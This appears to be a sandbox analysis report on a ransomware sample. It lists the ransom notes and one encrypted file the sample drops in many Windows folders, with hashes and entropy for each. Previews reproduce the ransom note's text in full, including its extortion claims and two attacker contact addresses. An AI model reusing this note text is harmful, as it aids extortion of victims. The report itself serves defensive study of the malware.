                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.683247707848351
                  Encrypted:false
                  SSDEEP:192:moFbamDxLjKY1z9KM380i1f+9gjiPYTPsKVyhmRxBQNB5LHhMz2fqkJNYEzjS:pBD5V7b380i1f0gC0gixunaz2CgN9G
                  MD5:B049849BDEC3A8FF5997B2E9F3C633BC
                  SHA1:EE6F1C53236FB6074B7ACFF999946BC94AC5D5FF
                  SHA-256:D9E2721531BC046A83992FDFE81DD977400CCF47B0BC5DBD4C6E3638A5558854
                  SHA-512:D5A5086DC698220938905B1C3D6C1190F90FA3F6334567BF1B7221DD89D2E4B8019D6945507999FFDF6EEE3FB88C2C4E8C72297920FB05A0398EC5316DD40540
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
